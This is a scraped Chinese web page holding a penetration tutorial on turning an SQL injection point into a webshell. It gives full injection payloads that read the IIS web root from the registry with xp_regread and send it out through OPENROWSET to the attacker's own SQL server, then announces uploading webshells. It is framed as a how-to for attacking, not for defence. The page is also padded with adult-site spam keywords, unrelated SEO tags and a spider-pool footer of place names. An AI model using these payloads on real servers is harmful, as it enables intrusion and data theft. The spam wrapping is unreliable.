婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 滲透中用openrowset搞shell的方法

滲透中用openrowset搞shell的方法
熱門標簽:臨滄移動外呼系統哪家有 寧夏保險智能外呼系統哪家好 溫嶺代理外呼系統 防城港市ai電銷機器人 怎么更改地圖標注電話 交行外呼系統有哪些 激戰黃昏地圖標注說明 不同的地圖標注 隨州銷售外呼系統平臺
滲透中用openrowset搞shell的方法 
得到SQL注入點,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發現屏蔽了SQL錯誤信息,得不到物理路徑,那還寫個PP馬了.
聯想到一個權限不是很高的命令openrowset,進行跨庫服務器查詢,就是把一個SQL命令發送到遠程數據庫,然后看返回的結果,但是要啟動事件跟蹤!我們可以把網站信息寫入數據庫,然后%$^%$@#$@^%$~
首先在自己機器建立SQL數據庫 

然后在對方機器上建立個表 create table [dbo].[fenggou]([cha8][char](255))--

在對方執行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個表里就會有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說,''D:\WEB"就是從注冊表里讀出的物理路徑拉.然后執行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于執行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時你在你機器上SQL事件追蹤器上就會顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~ 

標簽:紅河 阜陽 哈密 忻州 無錫 青海 河源 沈陽

巨人網絡通訊聲明:本文標題《滲透中用openrowset搞shell的方法》,本文關鍵詞  滲透,中用,openrowset,搞,shell,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《滲透中用openrowset搞shell的方法》相關的同類信息!
  • 本頁收集關于滲透中用openrowset搞shell的方法的相關信息資訊供網民參考!
    • 推薦文章
    主站蜘蛛池模板: 大宁县| 安阳市| 屏东县| 通山县| 望城县| 平塘县| 贺兰县| 哈尔滨市| 沅陵县| 玉树县| 白玉县| 新宁县| 红桥区| 绍兴市| 民丰县| 鄄城县| 开江县| 沾化县| 曲麻莱县| 连平县| 永德县| 仁寿县| 仁布县| 仁怀市| 阿克苏市| 格尔木市| 卓尼县| 明水县| 达尔| 临沧市| 霍邱县| 鹰潭市| 健康| 明星| 沅江市| 林芝县| 呼和浩特市| 揭阳市| 涟源市| 应城市| 武功县|